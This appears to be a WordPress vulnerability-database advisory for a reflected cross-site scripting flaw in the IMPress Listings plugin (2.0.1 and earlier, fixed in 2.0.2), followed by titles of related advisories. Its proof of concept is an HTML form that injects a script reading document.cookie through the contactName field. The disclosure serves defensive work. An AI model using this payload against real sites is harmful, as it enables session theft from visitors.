IMPress Listings <= 2.0.1 – Unauthenticated Reflected Cross-Site Scripting (XSS) | CVE 2016-11013 | Plugin Vulnerabilities

Description

The IMPress Listings WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.

Proof of Concept

<html>
<head><title>IMPress Listings XSS Demo</title></head>
<body>
	<form action="http://demo.wp-listings.com/listings/1048-cherrywood-dr/" method="POST">
	<input type=hidden name=contactName value='"><script>alert(document.cookie);</script><"'>
	<input type=submit value="Test XSS">
	</form>
</body>
</html>

Affects Plugins

Fixed in 2.0.2

References

CVE

URL

https://github.com/agentevolution/wp-listings/pull/52

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Submitter

Kris

Submitter website

Submitter twitter

Verified

No

WPVDB ID

d7b783fb-331e-4252-bf55-338a22d6f5c0

Timeline

Publicly Published

2016-01-27 (about 10 years ago)

Added

2016-01-28 (about 10 years ago)

Last Updated

2020-09-22 (about 5 years ago)

Other

Published

Title

Published

2025-09-26

Title

bbp topic count <= 3.1 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2021-03-30

Title

Advanced Booking Calendar < 1.6.8 - Authenticated Reflected Cross-Site Scripting (XSS)

Published

2022-10-27

Title

JetBackup < 1.6.9.1 - Admin+ Stored XSS

Published

2014-08-01

Title

Feedweb 2.4 - DOM Cross-Site Scripting (XSS)

Published

2024-09-30

Title

123.chat - Video Chat <= 1.3.1 - Unauthenticated Stored Cross-Site Scripting